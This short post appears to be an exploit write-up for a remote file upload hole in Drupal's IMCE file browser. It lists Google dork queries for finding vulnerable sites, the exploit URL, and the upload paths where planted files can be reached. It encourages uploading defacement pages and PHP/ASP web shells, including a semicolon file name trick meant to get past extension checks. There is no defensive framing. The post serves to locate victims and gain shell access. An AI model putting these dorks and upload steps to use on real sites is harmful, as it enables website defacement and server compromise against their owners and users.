This is a very simple remote file upload exploit on drupal in which you can upload defaces,jpgs,php,asp,shell.asp;me ..etcetc
Google Dorks :
inurl:"/imce?dir="
intitle:"File Browser"
exploit :
http://website.com/imce?dir=
Shell Access :
http://website.com/files/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
Remote file upload vulnerbility | Durpal IMCE Mkdir remote File upload exploit